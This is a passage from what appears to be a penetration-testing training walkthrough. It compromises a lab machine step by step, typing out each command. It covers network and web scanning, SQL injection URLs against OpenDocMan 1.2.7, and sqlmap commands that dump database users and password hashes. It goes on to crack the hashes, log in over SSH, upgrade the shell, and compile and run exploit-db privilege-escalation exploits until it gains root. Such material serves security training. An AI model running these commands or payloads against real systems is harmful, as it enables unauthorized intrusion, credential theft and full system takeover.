3668. ---------------------------------------------------------------------------------------------------------------------------------------------------------
3669.  
3670. Attack steps:
3671. -------------
3672.  
3673.  
3674.  
3675. Step 1: Ping sweep the target network
3676. -------------------------------------
3677.  
3678.  
3679. ---------------------------Type This-----------------------------------
3680. nmap -sP 172.31.2.0/24
3681. -----------------------------------------------------------------------
3682.  
3683.  
3684.  
3685. - Found 3 hosts
3686. 172.31.2.64
3687. 172.31.2.217
3688. 172.31.2.238
3689.  
3690.  
3691.  
3692. Step 2: Port scan target system
3693. -------------------------------
3694.  
3695.  
3696. ---------------------------Type This-----------------------------------
3697. nmap -sV 172.31.2.64
3698. -----------------------------------------------------------------------
3699.  
3700.  
3701.  
3702. -------------Scan Results--------------------------------------------
3703. PORT STATE SERVICE VERSION
3704. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
3705. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
3706. 514/tcp filtered shell
3707. 1037/tcp filtered ams
3708. 6667/tcp open irc ngircd
3709. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
3710. --------------------------------------------------------------------
3711.  
3712.  
3713. Step 3: Vulnerability Scan the webserver
3714. ----------------------------------------
3715.  
3716.  
3717. ---------------------------Type This-----------------------------------
3718. cd ~/toolz/
3719.  
3720. rm -rf nikto*
3721.  
3722. git clone https://github.com/sullo/nikto.git Nikto2
3723.  
3724. cd Nikto2/program
3725.  
3726. perl nikto.pl -h 172.31.2.64
3727. -----------------------------------------------------------------------
3728.  
3729.  
3730. Step 4: Run dirbuster or similar directory bruteforce tool against the target
3731. -----------------------------------------------------------------------------
3732.  
3733.  
3734. ---------------------------Type This-----------------------------------
3735. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
3736.  
3737. perl Webr00t.pl -h 172.31.2.64 -v
3738. -----------------------------------------------------------------------
3739. or with dirbuster (dirb)
3740.  
3741. ---------------------------Type This-----------------------------------
3742. git clone https://github.com/v0re/dirb.git
3743.  
3744. cd dirb/
3745.  
3746. ./configure
3747.  
3748. make
3749.  
3750. dirb
3751.  
3752. ./dirb http://172.31.2.64 wordlists/big.txt
3753. -----------------------------------------------------------------------
3754.  
3755.  
3756.  
3757. Step 5: Browse the web site to look for clues
3758. ---------------------------------------------
3759. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
3760.  
3761.  
3762. ..... really didn't get much from here so we just opened the web page in a browser
3763. http://172.31.2.64/
3764.  
3765. .....browsed to the webpage and saw that it pointed to:
3766. http://172.31.2.64/jabc
3767.  
3768. ....clicked on documentation link and found hidden text that pointed to here:
3769. http://172.31.2.64/jabcd0cs/
3770.  
3771. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
3772. https://www.exploit-db.com/exploits/32075/
3773.  
3774. Tried the sql injection described in exploit-db:
3775. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
3776.  
3777. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
3778.  
3779.  
3780.  
3781. Tried to run sqlmap against the target
3782.  
3783.  
3784. ---------------------------Type This-----------------------------------
3785. cd sqlmap-dev/
3786. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
3787.  
3788. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
3789.  
3790. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
3791.  
3792. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
3793.  
3794. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
3795. -----------------------------------------------------------------------
3796.  
3797.  
3798.  
3799. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
3800. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
3801.  
3802.  
3803.  
3804. ---------------------------Type This-----------------------------------
3805. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
3806.  
3807. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
3808. -----------------------------------------------------------------------
3809.  
3810. username: webmin
3811. hash: b78aae356709f8c31118ea613980954b
3812.  
3813. https://hashkiller.co.uk/md5-decrypter.aspx
3814.  
3815. hash: b78aae356709f8c31118ea613980954b
3816. pass: webmin1980
3817.  
3818.  
3819. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
3820.  
3821.  
3822.  
3823. ---------------------------Type This-----------------------------------
3824. ssh -l webmin 172.31.2.64
3825. webmin1980
3826.  
3827. id
3828.  
3829. cat /etc/*release
3830. -----------------------------------------------------------------------
3831.  
3832.  
3833.  
3834. ....tired of not having a real command shell...
3835.  
3836.  
3837. ---------------------------Type This-----------------------------------
3838. python -c 'import pty;pty.spawn("/bin/bash")'
3839.  
3840.  
3841. cd /tmp
3842.  
3843. pwd
3844.  
3845.  
3846. cat >> exploit.c << out
3847.  
3848. **************paste in the content from here *****************
3849. https://www.exploit-db.com/raw/39166/
3850.  
3851.  
3852. ------ hit enter a few times ------
3853.  
3854. ------ then type 'out' ----- this closes the file handle...
3855.  
3856.  
3857.  
3858. ---------------------------Type This-----------------------------------
3859. gcc -o boom exploit.c
3860.  
3861. ./boom
3862. -----------------------------------------------------------------------
3863.  
3864.  
3865. ------------exploit failed, damn let's try another one ---------
3866.  
3867.  
3868.  
3869. ---------------------------Type This-----------------------------------
3870. cat >> exploit2.c << out
3871.  
3872. **************paste in the content from here *****************
3873. https://www.exploit-db.com/raw/37292/
3874.  
3875.  
3876. out
3877.  
3878.  
3879. gcc -o boom2 exploit2.c
3880.  
3881. ./boom2
3882.  
3883. id
3884.  
3885.  
3886. ......YEAH - do the happy dance!!!!
3887. =============================================== Now back to the previous server ==============================================================